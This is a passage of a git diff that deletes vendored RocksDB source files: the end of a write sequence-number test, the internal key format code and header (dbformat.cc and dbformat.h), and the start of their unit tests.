-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <memory>
-#include <thread>
-#include <vector>
-#include "db/db_test_util.h"
-#include "db/write_batch_internal.h"
-#include "port/stack_trace.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-// Test variations of WriteImpl.
-class DBWriteTest : public DBTestBase, public testing::WithParamInterface<int> {
- public:
-  DBWriteTest() : DBTestBase("/db_write_test") {}
-
-  void Open() { DBTestBase::Reopen(GetOptions(GetParam())); }
-};
-
-// Sequence number should be return through input write batch.
-TEST_P(DBWriteTest, ReturnSeuqneceNumber) {
-  Random rnd(4422);
-  Open();
-  for (int i = 0; i < 100; i++) {
-    WriteBatch batch;
-    batch.Put("key" + ToString(i), test::RandomHumanReadableString(&rnd, 10));
-    ASSERT_OK(dbfull()->Write(WriteOptions(), &batch));
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(),
-              WriteBatchInternal::Sequence(&batch));
-  }
-}
-
-TEST_P(DBWriteTest, ReturnSeuqneceNumberMultiThreaded) {
-  constexpr size_t kThreads = 16;
-  constexpr size_t kNumKeys = 1000;
-  Open();
-  ASSERT_EQ(0, dbfull()->GetLatestSequenceNumber());
-  // Check each sequence is used once and only once.
-  std::vector<std::atomic_flag> flags(kNumKeys * kThreads + 1);
-  for (size_t i = 0; i < flags.size(); i++) {
-    flags[i].clear();
-  }
-  auto writer = [&](size_t id) {
-    Random rnd(4422 + static_cast<uint32_t>(id));
-    for (size_t k = 0; k < kNumKeys; k++) {
-      WriteBatch batch;
-      batch.Put("key" + ToString(id) + "-" + ToString(k),
-                test::RandomHumanReadableString(&rnd, 10));
-      ASSERT_OK(dbfull()->Write(WriteOptions(), &batch));
-      SequenceNumber sequence = WriteBatchInternal::Sequence(&batch);
-      ASSERT_GT(sequence, 0);
-      ASSERT_LE(sequence, kNumKeys * kThreads);
-      // The sequence isn't consumed by someone else.
-      ASSERT_FALSE(flags[sequence].test_and_set());
-    }
-  };
-  std::vector<port::Thread> threads;
-  for (size_t i = 0; i < kThreads; i++) {
-    threads.emplace_back(writer, i);
-  }
-  for (size_t i = 0; i < kThreads; i++) {
-    threads[i].join();
-  }
-}
-
-INSTANTIATE_TEST_CASE_P(DBWriteTestInstance, DBWriteTest,
-                        testing::Values(DBTestBase::kDefault,
-                                        DBTestBase::kConcurrentWALWrites,
-                                        DBTestBase::kPipelinedWrite));
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/dbformat.cc b/thirdparty/rocksdb/db/dbformat.cc
deleted file mode 100644
index f287ae9..0000000
--- a/thirdparty/rocksdb/db/dbformat.cc
+++ /dev/null
@@ -1,177 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/dbformat.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <stdio.h>
-#include "monitoring/perf_context_imp.h"
-#include "port/port.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-// kValueTypeForSeek defines the ValueType that should be passed when
-// constructing a ParsedInternalKey object for seeking to a particular
-// sequence number (since we sort sequence numbers in decreasing order
-// and the value type is embedded as the low 8 bits in the sequence
-// number in internal keys, we need to use the highest-numbered
-// ValueType, not the lowest).
-const ValueType kValueTypeForSeek = kTypeBlobIndex;
-const ValueType kValueTypeForSeekForPrev = kTypeDeletion;
-
-uint64_t PackSequenceAndType(uint64_t seq, ValueType t) {
-  assert(seq <= kMaxSequenceNumber);
-  assert(IsExtendedValueType(t));
-  return (seq << 8) | t;
-}
-
-void UnPackSequenceAndType(uint64_t packed, uint64_t* seq, ValueType* t) {
-  *seq = packed >> 8;
-  *t = static_cast<ValueType>(packed & 0xff);
-
-  assert(*seq <= kMaxSequenceNumber);
-  assert(IsExtendedValueType(*t));
-}
-
-void AppendInternalKey(std::string* result, const ParsedInternalKey& key) {
-  result->append(key.user_key.data(), key.user_key.size());
-  PutFixed64(result, PackSequenceAndType(key.sequence, key.type));
-}
-
-void AppendInternalKeyFooter(std::string* result, SequenceNumber s,
-                             ValueType t) {
-  PutFixed64(result, PackSequenceAndType(s, t));
-}
-
-std::string ParsedInternalKey::DebugString(bool hex) const {
-  char buf[50];
-  snprintf(buf, sizeof(buf), "' seq:%" PRIu64 ", type:%d", sequence,
-           static_cast<int>(type));
-  std::string result = "'";
-  result += user_key.ToString(hex);
-  result += buf;
-  return result;
-}
-
-std::string InternalKey::DebugString(bool hex) const {
-  std::string result;
-  ParsedInternalKey parsed;
-  if (ParseInternalKey(rep_, &parsed)) {
-    result = parsed.DebugString(hex);
-  } else {
-    result = "(bad)";
-    result.append(EscapeString(rep_));
-  }
-  return result;
-}
-
-const char* InternalKeyComparator::Name() const {
-  return name_.c_str();
-}
-
-int InternalKeyComparator::Compare(const Slice& akey, const Slice& bkey) const {
-  // Order by:
-  //    increasing user key (according to user-supplied comparator)
-  //    decreasing sequence number
-  //    decreasing type (though sequence# should be enough to disambiguate)
-  int r = user_comparator_->Compare(ExtractUserKey(akey), ExtractUserKey(bkey));
-  PERF_COUNTER_ADD(user_key_comparison_count, 1);
-  if (r == 0) {
-    const uint64_t anum = DecodeFixed64(akey.data() + akey.size() - 8);
-    const uint64_t bnum = DecodeFixed64(bkey.data() + bkey.size() - 8);
-    if (anum > bnum) {
-      r = -1;
-    } else if (anum < bnum) {
-      r = +1;
-    }
-  }
-  return r;
-}
-
-int InternalKeyComparator::Compare(const ParsedInternalKey& a,
-                                   const ParsedInternalKey& b) const {
-  // Order by:
-  //    increasing user key (according to user-supplied comparator)
-  //    decreasing sequence number
-  //    decreasing type (though sequence# should be enough to disambiguate)
-  int r = user_comparator_->Compare(a.user_key, b.user_key);
-  PERF_COUNTER_ADD(user_key_comparison_count, 1);
-  if (r == 0) {
-    if (a.sequence > b.sequence) {
-      r = -1;
-    } else if (a.sequence < b.sequence) {
-      r = +1;
-    } else if (a.type > b.type) {
-      r = -1;
-    } else if (a.type < b.type) {
-      r = +1;
-    }
-  }
-  return r;
-}
-
-void InternalKeyComparator::FindShortestSeparator(
-      std::string* start,
-      const Slice& limit) const {
-  // Attempt to shorten the user portion of the key
-  Slice user_start = ExtractUserKey(*start);
-  Slice user_limit = ExtractUserKey(limit);
-  std::string tmp(user_start.data(), user_start.size());
-  user_comparator_->FindShortestSeparator(&tmp, user_limit);
-  if (tmp.size() <= user_start.size() &&
-      user_comparator_->Compare(user_start, tmp) < 0) {
-    // User key has become shorter physically, but larger logically.
-    // Tack on the earliest possible number to the shortened user key.
-    PutFixed64(&tmp, PackSequenceAndType(kMaxSequenceNumber,kValueTypeForSeek));
-    assert(this->Compare(*start, tmp) < 0);
-    assert(this->Compare(tmp, limit) < 0);
-    start->swap(tmp);
-  }
-}
-
-void InternalKeyComparator::FindShortSuccessor(std::string* key) const {
-  Slice user_key = ExtractUserKey(*key);
-  std::string tmp(user_key.data(), user_key.size());
-  user_comparator_->FindShortSuccessor(&tmp);
-  if (tmp.size() <= user_key.size() &&
-      user_comparator_->Compare(user_key, tmp) < 0) {
-    // User key has become shorter physically, but larger logically.
-    // Tack on the earliest possible number to the shortened user key.
-    PutFixed64(&tmp, PackSequenceAndType(kMaxSequenceNumber,kValueTypeForSeek));
-    assert(this->Compare(*key, tmp) < 0);
-    key->swap(tmp);
-  }
-}
-
-LookupKey::LookupKey(const Slice& _user_key, SequenceNumber s) {
-  size_t usize = _user_key.size();
-  size_t needed = usize + 13;  // A conservative estimate
-  char* dst;
-  if (needed <= sizeof(space_)) {
-    dst = space_;
-  } else {
-    dst = new char[needed];
-  }
-  start_ = dst;
-  // NOTE: We don't support users keys of more than 2GB :)
-  dst = EncodeVarint32(dst, static_cast<uint32_t>(usize + 8));
-  kstart_ = dst;
-  memcpy(dst, _user_key.data(), usize);
-  dst += usize;
-  EncodeFixed64(dst, PackSequenceAndType(s, kValueTypeForSeek));
-  dst += 8;
-  end_ = dst;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/dbformat.h b/thirdparty/rocksdb/db/dbformat.h
deleted file mode 100644
index c58b836..0000000
--- a/thirdparty/rocksdb/db/dbformat.h
+++ /dev/null
@@ -1,598 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <stdio.h>
-#include <string>
-#include <utility>
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "rocksdb/types.h"
-#include "util/coding.h"
-#include "util/logging.h"
-
-namespace rocksdb {
-
-class InternalKey;
-
-// Value types encoded as the last component of internal keys.
-// DO NOT CHANGE THESE ENUM VALUES: they are embedded in the on-disk
-// data structures.
-// The highest bit of the value type needs to be reserved to SST tables
-// for them to do more flexible encoding.
-enum ValueType : unsigned char {
-  kTypeDeletion = 0x0,
-  kTypeValue = 0x1,
-  kTypeMerge = 0x2,
-  kTypeLogData = 0x3,               // WAL only.
-  kTypeColumnFamilyDeletion = 0x4,  // WAL only.
-  kTypeColumnFamilyValue = 0x5,     // WAL only.
-  kTypeColumnFamilyMerge = 0x6,     // WAL only.
-  kTypeSingleDeletion = 0x7,
-  kTypeColumnFamilySingleDeletion = 0x8,  // WAL only.
-  kTypeBeginPrepareXID = 0x9,             // WAL only.
-  kTypeEndPrepareXID = 0xA,               // WAL only.
-  kTypeCommitXID = 0xB,                   // WAL only.
-  kTypeRollbackXID = 0xC,                 // WAL only.
-  kTypeNoop = 0xD,                        // WAL only.
-  kTypeColumnFamilyRangeDeletion = 0xE,   // WAL only.
-  kTypeRangeDeletion = 0xF,               // meta block
-  kTypeColumnFamilyBlobIndex = 0x10,      // Blob DB only
-  kTypeBlobIndex = 0x11,                  // Blob DB only
-  kMaxValue = 0x7F                        // Not used for storing records.
-};
-
-// Defined in dbformat.cc
-extern const ValueType kValueTypeForSeek;
-extern const ValueType kValueTypeForSeekForPrev;
-
-// Checks whether a type is an inline value type
-// (i.e. a type used in memtable skiplist and sst file datablock).
-inline bool IsValueType(ValueType t) {
-  return t <= kTypeMerge || t == kTypeSingleDeletion || t == kTypeBlobIndex;
-}
-
-// Checks whether a type is from user operation
-// kTypeRangeDeletion is in meta block so this API is separated from above
-inline bool IsExtendedValueType(ValueType t) {
-  return IsValueType(t) || t == kTypeRangeDeletion;
-}
-
-// We leave eight bits empty at the bottom so a type and sequence#
-// can be packed together into 64-bits.
-static const SequenceNumber kMaxSequenceNumber =
-    ((0x1ull << 56) - 1);
-
-static const SequenceNumber kDisableGlobalSequenceNumber = port::kMaxUint64;
-
-struct ParsedInternalKey {
-  Slice user_key;
-  SequenceNumber sequence;
-  ValueType type;
-
-  ParsedInternalKey()
-      : sequence(kMaxSequenceNumber)  // Make code analyzer happy
-  {}  // Intentionally left uninitialized (for speed)
-  ParsedInternalKey(const Slice& u, const SequenceNumber& seq, ValueType t)
-      : user_key(u), sequence(seq), type(t) { }
-  std::string DebugString(bool hex = false) const;
-
-  void clear() {
-    user_key.clear();
-    sequence = 0;
-    type = kTypeDeletion;
-  }
-};
-
-// Return the length of the encoding of "key".
-inline size_t InternalKeyEncodingLength(const ParsedInternalKey& key) {
-  return key.user_key.size() + 8;
-}
-
-// Pack a sequence number and a ValueType into a uint64_t
-extern uint64_t PackSequenceAndType(uint64_t seq, ValueType t);
-
-// Given the result of PackSequenceAndType, store the sequence number in *seq
-// and the ValueType in *t.
-extern void UnPackSequenceAndType(uint64_t packed, uint64_t* seq, ValueType* t);
-
-// Append the serialization of "key" to *result.
-extern void AppendInternalKey(std::string* result,
-                              const ParsedInternalKey& key);
-// Serialized internal key consists of user key followed by footer.
-// This function appends the footer to *result, assuming that *result already
-// contains the user key at the end.
-extern void AppendInternalKeyFooter(std::string* result, SequenceNumber s,
-                                    ValueType t);
-
-// Attempt to parse an internal key from "internal_key".  On success,
-// stores the parsed data in "*result", and returns true.
-//
-// On error, returns false, leaves "*result" in an undefined state.
-extern bool ParseInternalKey(const Slice& internal_key,
-                             ParsedInternalKey* result);
-
-// Returns the user key portion of an internal key.
-inline Slice ExtractUserKey(const Slice& internal_key) {
-  assert(internal_key.size() >= 8);
-  return Slice(internal_key.data(), internal_key.size() - 8);
-}
-
-inline ValueType ExtractValueType(const Slice& internal_key) {
-  assert(internal_key.size() >= 8);
-  const size_t n = internal_key.size();
-  uint64_t num = DecodeFixed64(internal_key.data() + n - 8);
-  unsigned char c = num & 0xff;
-  return static_cast<ValueType>(c);
-}
-
-// A comparator for internal keys that uses a specified comparator for
-// the user key portion and breaks ties by decreasing sequence number.
-class InternalKeyComparator : public Comparator {
- private:
-  const Comparator* user_comparator_;
-  std::string name_;
- public:
-  explicit InternalKeyComparator(const Comparator* c) : user_comparator_(c),
-    name_("rocksdb.InternalKeyComparator:" +
-          std::string(user_comparator_->Name())) {
-  }
-  virtual ~InternalKeyComparator() {}
-
-  virtual const char* Name() const override;
-  virtual int Compare(const Slice& a, const Slice& b) const override;
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override;
-  virtual void FindShortSuccessor(std::string* key) const override;
-
-  const Comparator* user_comparator() const { return user_comparator_; }
-
-  int Compare(const InternalKey& a, const InternalKey& b) const;
-  int Compare(const ParsedInternalKey& a, const ParsedInternalKey& b) const;
-  virtual const Comparator* GetRootComparator() const override {
-    return user_comparator_->GetRootComparator();
-  }
-};
-
-// Modules in this directory should keep internal keys wrapped inside
-// the following class instead of plain strings so that we do not
-// incorrectly use string comparisons instead of an InternalKeyComparator.
-class InternalKey {
- private:
-  std::string rep_;
- public:
-  InternalKey() { }   // Leave rep_ as empty to indicate it is invalid
-  InternalKey(const Slice& _user_key, SequenceNumber s, ValueType t) {
-    AppendInternalKey(&rep_, ParsedInternalKey(_user_key, s, t));
-  }
-
-  // sets the internal key to be bigger or equal to all internal keys with this
-  // user key
-  void SetMaxPossibleForUserKey(const Slice& _user_key) {
-    AppendInternalKey(&rep_, ParsedInternalKey(_user_key, kMaxSequenceNumber,
-                                               kValueTypeForSeek));
-  }
-
-  // sets the internal key to be smaller or equal to all internal keys with this
-  // user key
-  void SetMinPossibleForUserKey(const Slice& _user_key) {
-    AppendInternalKey(
-        &rep_, ParsedInternalKey(_user_key, 0, static_cast<ValueType>(0)));
-  }
-
-  bool Valid() const {
-    ParsedInternalKey parsed;
-    return ParseInternalKey(Slice(rep_), &parsed);
-  }
-
-  void DecodeFrom(const Slice& s) { rep_.assign(s.data(), s.size()); }
-  Slice Encode() const {
-    assert(!rep_.empty());
-    return rep_;
-  }
-
-  Slice user_key() const { return ExtractUserKey(rep_); }
-  size_t size() { return rep_.size(); }
-
-  void Set(const Slice& _user_key, SequenceNumber s, ValueType t) {
-    SetFrom(ParsedInternalKey(_user_key, s, t));
-  }
-
-  void SetFrom(const ParsedInternalKey& p) {
-    rep_.clear();
-    AppendInternalKey(&rep_, p);
-  }
-
-  void Clear() { rep_.clear(); }
-
-  // The underlying representation.
-  // Intended only to be used together with ConvertFromUserKey().
-  std::string* rep() { return &rep_; }
-
-  // Assuming that *rep() contains a user key, this method makes internal key
-  // out of it in-place. This saves a memcpy compared to Set()/SetFrom().
-  void ConvertFromUserKey(SequenceNumber s, ValueType t) {
-    AppendInternalKeyFooter(&rep_, s, t);
-  }
-
-  std::string DebugString(bool hex = false) const;
-};
-
-inline int InternalKeyComparator::Compare(
-    const InternalKey& a, const InternalKey& b) const {
-  return Compare(a.Encode(), b.Encode());
-}
-
-inline bool ParseInternalKey(const Slice& internal_key,
-                             ParsedInternalKey* result) {
-  const size_t n = internal_key.size();
-  if (n < 8) return false;
-  uint64_t num = DecodeFixed64(internal_key.data() + n - 8);
-  unsigned char c = num & 0xff;
-  result->sequence = num >> 8;
-  result->type = static_cast<ValueType>(c);
-  assert(result->type <= ValueType::kMaxValue);
-  result->user_key = Slice(internal_key.data(), n - 8);
-  return IsExtendedValueType(result->type);
-}
-
-// Update the sequence number in the internal key.
-// Guarantees not to invalidate ikey.data().
-inline void UpdateInternalKey(std::string* ikey, uint64_t seq, ValueType t) {
-  size_t ikey_sz = ikey->size();
-  assert(ikey_sz >= 8);
-  uint64_t newval = (seq << 8) | t;
-
-  // Note: Since C++11, strings are guaranteed to be stored contiguously and
-  // string::operator[]() is guaranteed not to change ikey.data().
-  EncodeFixed64(&(*ikey)[ikey_sz - 8], newval);
-}
-
-// Get the sequence number from the internal key
-inline uint64_t GetInternalKeySeqno(const Slice& internal_key) {
-  const size_t n = internal_key.size();
-  assert(n >= 8);
-  uint64_t num = DecodeFixed64(internal_key.data() + n - 8);
-  return num >> 8;
-}
-
-
-// A helper class useful for DBImpl::Get()
-class LookupKey {
- public:
-  // Initialize *this for looking up user_key at a snapshot with
-  // the specified sequence number.
-  LookupKey(const Slice& _user_key, SequenceNumber sequence);
-
-  ~LookupKey();
-
-  // Return a key suitable for lookup in a MemTable.
-  Slice memtable_key() const {
-    return Slice(start_, static_cast<size_t>(end_ - start_));
-  }
-
-  // Return an internal key (suitable for passing to an internal iterator)
-  Slice internal_key() const {
-    return Slice(kstart_, static_cast<size_t>(end_ - kstart_));
-  }
-
-  // Return the user key
-  Slice user_key() const {
-    return Slice(kstart_, static_cast<size_t>(end_ - kstart_ - 8));
-  }
-
- private:
-  // We construct a char array of the form:
-  //    klength  varint32               <-- start_
-  //    userkey  char[klength]          <-- kstart_
-  //    tag      uint64
-  //                                    <-- end_
-  // The array is a suitable MemTable key.
-  // The suffix starting with "userkey" can be used as an InternalKey.
-  const char* start_;
-  const char* kstart_;
-  const char* end_;
-  char space_[200];      // Avoid allocation for short keys
-
-  // No copying allowed
-  LookupKey(const LookupKey&);
-  void operator=(const LookupKey&);
-};
-
-inline LookupKey::~LookupKey() {
-  if (start_ != space_) delete[] start_;
-}
-
-class IterKey {
- public:
-  IterKey()
-      : buf_(space_),
-        buf_size_(sizeof(space_)),
-        key_(buf_),
-        key_size_(0),
-        is_user_key_(true) {}
-
-  ~IterKey() { ResetBuffer(); }
-
-  Slice GetInternalKey() const {
-    assert(!IsUserKey());
-    return Slice(key_, key_size_);
-  }
-
-  Slice GetUserKey() const {
-    if (IsUserKey()) {
-      return Slice(key_, key_size_);
-    } else {
-      assert(key_size_ >= 8);
-      return Slice(key_, key_size_ - 8);
-    }
-  }
-
-  size_t Size() const { return key_size_; }
-
-  void Clear() { key_size_ = 0; }
-
-  // Append "non_shared_data" to its back, from "shared_len"
-  // This function is used in Block::Iter::ParseNextKey
-  // shared_len: bytes in [0, shard_len-1] would be remained
-  // non_shared_data: data to be append, its length must be >= non_shared_len
-  void TrimAppend(const size_t shared_len, const char* non_shared_data,
-                  const size_t non_shared_len) {
-    assert(shared_len <= key_size_);
-    size_t total_size = shared_len + non_shared_len;
-
-    if (IsKeyPinned() /* key is not in buf_ */) {
-      // Copy the key from external memory to buf_ (copy shared_len bytes)
-      EnlargeBufferIfNeeded(total_size);
-      memcpy(buf_, key_, shared_len);
-    } else if (total_size > buf_size_) {
-      // Need to allocate space, delete previous space
-      char* p = new char[total_size];
-      memcpy(p, key_, shared_len);
-
-      if (buf_ != space_) {
-        delete[] buf_;
-      }
-
-      buf_ = p;
-      buf_size_ = total_size;
-    }
-
-    memcpy(buf_ + shared_len, non_shared_data, non_shared_len);
-    key_ = buf_;
-    key_size_ = total_size;
-  }
-
-  Slice SetUserKey(const Slice& key, bool copy = true) {
-    is_user_key_ = true;
-    return SetKeyImpl(key, copy);
-  }
-
-  Slice SetInternalKey(const Slice& key, bool copy = true) {
-    is_user_key_ = false;
-    return SetKeyImpl(key, copy);
-  }
-
-  // Copies the content of key, updates the reference to the user key in ikey
-  // and returns a Slice referencing the new copy.
-  Slice SetInternalKey(const Slice& key, ParsedInternalKey* ikey) {
-    size_t key_n = key.size();
-    assert(key_n >= 8);
-    SetInternalKey(key);
-    ikey->user_key = Slice(key_, key_n - 8);
-    return Slice(key_, key_n);
-  }
-
-  // Copy the key into IterKey own buf_
-  void OwnKey() {
-    assert(IsKeyPinned() == true);
-
-    Reserve(key_size_);
-    memcpy(buf_, key_, key_size_);
-    key_ = buf_;
-  }
-
-  // Update the sequence number in the internal key.  Guarantees not to
-  // invalidate slices to the key (and the user key).
-  void UpdateInternalKey(uint64_t seq, ValueType t) {
-    assert(!IsKeyPinned());
-    assert(key_size_ >= 8);
-    uint64_t newval = (seq << 8) | t;
-    EncodeFixed64(&buf_[key_size_ - 8], newval);
-  }
-
-  bool IsKeyPinned() const { return (key_ != buf_); }
-
-  void SetInternalKey(const Slice& key_prefix, const Slice& user_key,
-                      SequenceNumber s,
-                      ValueType value_type = kValueTypeForSeek) {
-    size_t psize = key_prefix.size();
-    size_t usize = user_key.size();
-    EnlargeBufferIfNeeded(psize + usize + sizeof(uint64_t));
-    if (psize > 0) {
-      memcpy(buf_, key_prefix.data(), psize);
-    }
-    memcpy(buf_ + psize, user_key.data(), usize);
-    EncodeFixed64(buf_ + usize + psize, PackSequenceAndType(s, value_type));
-
-    key_ = buf_;
-    key_size_ = psize + usize + sizeof(uint64_t);
-    is_user_key_ = false;
-  }
-
-  void SetInternalKey(const Slice& user_key, SequenceNumber s,
-                      ValueType value_type = kValueTypeForSeek) {
-    SetInternalKey(Slice(), user_key, s, value_type);
-  }
-
-  void Reserve(size_t size) {
-    EnlargeBufferIfNeeded(size);
-    key_size_ = size;
-  }
-
-  void SetInternalKey(const ParsedInternalKey& parsed_key) {
-    SetInternalKey(Slice(), parsed_key);
-  }
-
-  void SetInternalKey(const Slice& key_prefix,
-                      const ParsedInternalKey& parsed_key_suffix) {
-    SetInternalKey(key_prefix, parsed_key_suffix.user_key,
-                   parsed_key_suffix.sequence, parsed_key_suffix.type);
-  }
-
-  void EncodeLengthPrefixedKey(const Slice& key) {
-    auto size = key.size();
-    EnlargeBufferIfNeeded(size + static_cast<size_t>(VarintLength(size)));
-    char* ptr = EncodeVarint32(buf_, static_cast<uint32_t>(size));
-    memcpy(ptr, key.data(), size);
-    key_ = buf_;
-    is_user_key_ = true;
-  }
-
-  bool IsUserKey() const { return is_user_key_; }
-
- private:
-  char* buf_;
-  size_t buf_size_;
-  const char* key_;
-  size_t key_size_;
-  char space_[32];  // Avoid allocation for short keys
-  bool is_user_key_;
-
-  Slice SetKeyImpl(const Slice& key, bool copy) {
-    size_t size = key.size();
-    if (copy) {
-      // Copy key to buf_
-      EnlargeBufferIfNeeded(size);
-      memcpy(buf_, key.data(), size);
-      key_ = buf_;
-    } else {
-      // Update key_ to point to external memory
-      key_ = key.data();
-    }
-    key_size_ = size;
-    return Slice(key_, key_size_);
-  }
-
-  void ResetBuffer() {
-    if (buf_ != space_) {
-      delete[] buf_;
-      buf_ = space_;
-    }
-    buf_size_ = sizeof(space_);
-    key_size_ = 0;
-  }
-
-  // Enlarge the buffer size if needed based on key_size.
-  // By default, static allocated buffer is used. Once there is a key
-  // larger than the static allocated buffer, another buffer is dynamically
-  // allocated, until a larger key buffer is requested. In that case, we
-  // reallocate buffer and delete the old one.
-  void EnlargeBufferIfNeeded(size_t key_size) {
-    // If size is smaller than buffer size, continue using current buffer,
-    // or the static allocated one, as default
-    if (key_size > buf_size_) {
-      // Need to enlarge the buffer.
-      ResetBuffer();
-      buf_ = new char[key_size];
-      buf_size_ = key_size;
-    }
-  }
-
-  // No copying allowed
-  IterKey(const IterKey&) = delete;
-  void operator=(const IterKey&) = delete;
-};
-
-class InternalKeySliceTransform : public SliceTransform {
- public:
-  explicit InternalKeySliceTransform(const SliceTransform* transform)
-      : transform_(transform) {}
-
-  virtual const char* Name() const override { return transform_->Name(); }
-
-  virtual Slice Transform(const Slice& src) const override {
-    auto user_key = ExtractUserKey(src);
-    return transform_->Transform(user_key);
-  }
-
-  virtual bool InDomain(const Slice& src) const override {
-    auto user_key = ExtractUserKey(src);
-    return transform_->InDomain(user_key);
-  }
-
-  virtual bool InRange(const Slice& dst) const override {
-    auto user_key = ExtractUserKey(dst);
-    return transform_->InRange(user_key);
-  }
-
-  const SliceTransform* user_prefix_extractor() const { return transform_; }
-
- private:
-  // Like comparator, InternalKeySliceTransform will not take care of the
-  // deletion of transform_
-  const SliceTransform* const transform_;
-};
-
-// Read the key of a record from a write batch.
-// if this record represent the default column family then cf_record
-// must be passed as false, otherwise it must be passed as true.
-extern bool ReadKeyFromWriteBatchEntry(Slice* input, Slice* key,
-                                       bool cf_record);
-
-// Read record from a write batch piece from input.
-// tag, column_family, key, value and blob are return values. Callers own the
-// Slice they point to.
-// Tag is defined as ValueType.
-// input will be advanced to after the record.
-extern Status ReadRecordFromWriteBatch(Slice* input, char* tag,
-                                       uint32_t* column_family, Slice* key,
-                                       Slice* value, Slice* blob, Slice* xid);
-
-// When user call DeleteRange() to delete a range of keys,
-// we will store a serialized RangeTombstone in MemTable and SST.
-// the struct here is a easy-understood form
-// start/end_key_ is the start/end user key of the range to be deleted
-struct RangeTombstone {
-  Slice start_key_;
-  Slice end_key_;
-  SequenceNumber seq_;
-  RangeTombstone() = default;
-  RangeTombstone(Slice sk, Slice ek, SequenceNumber sn)
-      : start_key_(sk), end_key_(ek), seq_(sn) {}
-
-  RangeTombstone(ParsedInternalKey parsed_key, Slice value) {
-    start_key_ = parsed_key.user_key;
-    seq_ = parsed_key.sequence;
-    end_key_ = value;
-  }
-
-  // be careful to use Serialize(), allocates new memory
-  std::pair<InternalKey, Slice> Serialize() const {
-    auto key = InternalKey(start_key_, seq_, kTypeRangeDeletion);
-    Slice value = end_key_;
-    return std::make_pair(std::move(key), std::move(value));
-  }
-
-  // be careful to use SerializeKey(), allocates new memory
-  InternalKey SerializeKey() const {
-    return InternalKey(start_key_, seq_, kTypeRangeDeletion);
-  }
-
-  // be careful to use SerializeEndKey(), allocates new memory
-  InternalKey SerializeEndKey() const {
-    return InternalKey(end_key_, seq_, kTypeRangeDeletion);
-  }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/dbformat_test.cc b/thirdparty/rocksdb/db/dbformat_test.cc
deleted file mode 100644
index d96b575..0000000
--- a/thirdparty/rocksdb/db/dbformat_test.cc
+++ /dev/null
@@ -1,200 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/dbformat.h"
-#include "util/logging.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-static std::string IKey(const std::string& user_key,
-                        uint64_t seq,
-                        ValueType vt) {
-  std::string encoded;
-  AppendInternalKey(&encoded, ParsedInternalKey(user_key, seq, vt));
-  return encoded;
-}
-
-static std::string Shorten(const std::string& s, const std::string& l) {
-  std::string result = s;
-  InternalKeyComparator(BytewiseComparator()).FindShortestSeparator(&result, l);
-  return result;
-}
-
-static std::string ShortSuccessor(const std::string& s) {
-  std::string result = s;
-  InternalKeyComparator(BytewiseComparator()).FindShortSuccessor(&result);
-  return result;
-}
-
-static void TestKey(const std::string& key,
-                    uint64_t seq,
-                    ValueType vt) {
-  std::string encoded = IKey(key, seq, vt);
-
-  Slice in(encoded);
-  ParsedInternalKey decoded("", 0, kTypeValue);
-
-  ASSERT_TRUE(ParseInternalKey(in, &decoded));
-  ASSERT_EQ(key, decoded.user_key.ToString());
-  ASSERT_EQ(seq, decoded.sequence);
-  ASSERT_EQ(vt, decoded.type);
-
-  ASSERT_TRUE(!ParseInternalKey(Slice("bar"), &decoded));
-}
-
-class FormatTest : public testing::Test {};
-
-TEST_F(FormatTest, InternalKey_EncodeDecode) {
-  const char* keys[] = { "", "k", "hello", "longggggggggggggggggggggg" };
-  const uint64_t seq[] = {
-    1, 2, 3,
-    (1ull << 8) - 1, 1ull << 8, (1ull << 8) + 1,
-    (1ull << 16) - 1, 1ull << 16, (1ull << 16) + 1,
-    (1ull << 32) - 1, 1ull << 32, (1ull << 32) + 1
-  };
-  for (unsigned int k = 0; k < sizeof(keys) / sizeof(keys[0]); k++) {
-    for (unsigned int s = 0; s < sizeof(seq) / sizeof(seq[0]); s++) {
-      TestKey(keys[k], seq[s], kTypeValue);
-      TestKey("hello", 1, kTypeDeletion);
-    }
-  }
-}
-
-TEST_F(FormatTest, InternalKeyShortSeparator) {
-  // When user keys are same
-  ASSERT_EQ(IKey("foo", 100, kTypeValue),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("foo", 99, kTypeValue)));
-  ASSERT_EQ(IKey("foo", 100, kTypeValue),
-            Shorten(IKey("foo", 100, kTypeValue),
-                    IKey("foo", 101, kTypeValue)));
